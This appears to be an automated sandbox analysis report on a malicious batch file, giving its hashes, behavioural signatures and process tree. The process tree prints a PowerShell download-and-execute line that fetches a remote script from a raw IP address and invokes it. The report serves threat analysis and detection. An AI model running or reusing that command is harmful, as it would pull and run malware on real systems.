Analysis
-
max time kernel
111s -
max time network
102s -
platform
windows7_x64 -
resource
win7v200213 -
submitted
13-02-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
dTSMxBv5.bat
Resource
win7v200213
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
dTSMxBv5.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
dTSMxBv5.bat
-
Size
190B
-
MD5
b43fc9677f0267630d7259cae180102b
-
SHA1
47b41ad33d7109bec3a432b7dd105153f0ba610b
-
SHA256
656e7d92a11142f16b80b527eee75b122b5c19143c2c21da4c37af0d5bf57d7a
-
SHA512
88804f6050a25e4861b337a9f4db75d21706ab81f15cb1d77b6aa29349e6534af25025cd5ec800f36136124aa37a2f99f241108a7355fcf71bfa6aaac9ffd492
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/dTSMxBv5
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1624 powershell.exe -
Suspicious use of WriteProcessMemory 1 IoCs
Processes:
cmd.exedescription pid process target process PID 1600 wrote to memory of 1624 1600 cmd.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1624 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1624 powershell.exe 1624 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1624 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\dTSMxBv5.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/dTSMxBv5');Invoke-GUHPOFB;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request